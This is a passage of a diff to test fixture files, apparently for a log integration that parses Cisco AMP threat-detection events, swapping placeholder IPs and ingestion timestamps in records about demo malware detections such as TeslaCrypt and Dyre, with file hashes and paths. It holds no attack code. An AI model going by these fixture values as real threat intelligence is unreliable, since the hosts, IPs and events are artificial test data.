:\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3149,7 +3059,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3208,7 +3118,7 @@ "f9b02ad8d25157eebdb284631ff646316dc606d5" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3225,8 +3135,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070196717Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180335966167761000,\"timestamp\":1610705878,\"timestamp_nanoseconds\":875000000,\"date\":\"2021-01-15T10:17:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6180335966167760897\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"Fax.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\Documents\\\\Fax\\\\Fax.exe\",\"identity\":{\"sha256\":\"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc\",\"sha1\":\"f9b02ad8d25157eebdb284631ff646316dc606d5\",\"md5\":\"b2e15a06b0cca8a926c94f8a8eae3d88\"},\"parent\":{\"process_id\":3164,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\",\"sha1\":\"cea0890d4b99bae3f635a16dae71f69d137027b9\",\"md5\":\"8b88ebbb05a0e56b7dcc708498c02b3e\"}}}}}", + "ingested": "2021-12-09T13:35:32.898210600Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180335966167761000,\"timestamp\":1610705878,\"timestamp_nanoseconds\":875000000,\"date\":\"2021-01-15T10:17:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6180335966167760897\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"Fax.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\Documents\\\\Fax\\\\Fax.exe\",\"identity\":{\"sha256\":\"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc\",\"sha1\":\"f9b02ad8d25157eebdb284631ff646316dc606d5\",\"md5\":\"b2e15a06b0cca8a926c94f8a8eae3d88\"},\"parent\":{\"process_id\":3164,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\",\"sha1\":\"cea0890d4b99bae3f635a16dae71f69d137027b9\",\"md5\":\"8b88ebbb05a0e56b7dcc708498c02b3e\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3248,7 +3158,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -3302,7 +3212,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3319,8 +3229,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070198772Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668885361590000,\"timestamp\":1610705877,\"timestamp_nanoseconds\":672000000,\"date\":\"2021-01-15T10:17:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668885361590309\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:32.898216500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668885361590000,\"timestamp\":1610705877,\"timestamp_nanoseconds\":672000000,\"date\":\"2021-01-15T10:17:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668885361590309\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3342,7 +3252,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3392,7 +3302,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3405,8 +3315,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070200818Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668885361590000,\"timestamp\":1610705877,\"timestamp_nanoseconds\":653000000,\"date\":\"2021-01-15T10:17:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668885361590308\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:32.898222500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668885361590000,\"timestamp\":1610705877,\"timestamp_nanoseconds\":653000000,\"date\":\"2021-01-15T10:17:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668885361590308\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3428,7 +3338,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3478,7 +3388,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3491,8 +3401,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070202819Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668885361590000,\"timestamp\":1610705877,\"timestamp_nanoseconds\":260000000,\"date\":\"2021-01-15T10:17:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668885361590307\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:32.898228400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668885361590000,\"timestamp\":1610705877,\"timestamp_nanoseconds\":260000000,\"date\":\"2021-01-15T10:17:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668885361590307\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3514,7 +3424,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3561,7 +3471,7 @@ "ec80314ae4a2817be806b7ae27dbdb31a88226a0" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3571,8 +3481,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070204840Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259135965757000,\"timestamp\":1610705870,\"timestamp_nanoseconds\":8000000,\"date\":\"2021-01-15T10:17:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259135965757532\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", + "ingested": "2021-12-09T13:35:32.898234200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259135965757000,\"timestamp\":1610705870,\"timestamp_nanoseconds\":8000000,\"date\":\"2021-01-15T10:17:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259135965757532\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3594,7 +3504,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3640,7 +3550,7 @@ "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3650,8 +3560,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:16.070206862Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":1489955900291000600,\"timestamp\":1610705861,\"timestamp_nanoseconds\":291000000,\"date\":\"2021-01-15T10:17:41+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610705861,\"start_date\":\"2021-01-15T10:17:41+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\"}}}}}", + "ingested": "2021-12-09T13:35:32.898240100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":1489955900291000600,\"timestamp\":1610705861,\"timestamp_nanoseconds\":291000000,\"date\":\"2021-01-15T10:17:41+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610705861,\"start_date\":\"2021-01-15T10:17:41+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\"}}}}}", "code": "1107296272", "kind": "alert", "start": "2021-01-15T10:17:41.000Z", @@ -3673,7 +3583,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -3723,7 +3633,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3733,8 +3643,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070208933Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251516445164000,\"timestamp\":1610705859,\"timestamp_nanoseconds\":613000000,\"date\":\"2021-01-15T10:17:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159251516445163601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:32.898246200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251516445164000,\"timestamp\":1610705859,\"timestamp_nanoseconds\":613000000,\"date\":\"2021-01-15T10:17:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159251516445163601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3756,7 +3666,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3803,7 +3713,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3817,8 +3727,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070210963Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251516445164000,\"timestamp\":1610705859,\"timestamp_nanoseconds\":114000000,\"date\":\"2021-01-15T10:17:39+00:00\",\"event_type\":\"Threat 